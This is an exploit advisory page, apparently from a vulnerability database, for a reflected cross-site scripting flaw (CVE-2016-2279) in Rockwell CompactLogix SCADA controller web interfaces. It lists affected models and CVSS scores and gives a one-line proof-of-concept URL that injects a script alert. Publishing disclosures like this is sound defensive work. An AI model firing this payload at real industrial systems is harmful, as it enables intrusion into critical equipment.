Rockwell Scada System 27.011 Cross Site Scripting

2018.05.18
Credit: t4rkd3vilz
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Rockwell Scada System - Cross-Site Scripting # Date: 2018-05-16 # Exploit Author: t4rkd3vilz # Vendor Homepage: https://rockwellautomation.com/ # Software Link: http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?famID=4 # Version: 1769-L16ER-BB1B, Version 27.011 and earlier, 1769-L18ER-BB1B, Version 27.011 and earlier, # 1769-L18ERM-BB1B, Version 27.011 and earlier, 1769-L24ER-QB1B, # Version 27.011 and earlier, 1769-L24ER-QBFC1B # Version 27.011 and earlier, 1769-L27ERM-QBFC1B, Version 27.011 and earlier # 1769-L30ER Version 27.011 and earlier, 1769-L30ERM, Version 27.011 and earlier, # 1769-L30ER-NSE, Version 27.011 and earlier # 1769-L33ER Version 27.011 and earlier, 1769-L33ERM, Version 27.011 and earlier, 1769-L36ERM, Version 27.011 and earlier # 1769-L23E-QB1B, Version 20.018 and earlier (Discontinued June 2016), and 1769-L23E-QBFC1B, Version 20.018 and earlier # (Discontinued June 2016). # Tested on: Windows Machine and Chrome,Firefox explorer # CVE : CVE-2016-2279 # PoC http://TargetIP/rokform/SysDataDetail?name=<<script>alert(1);</script>


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top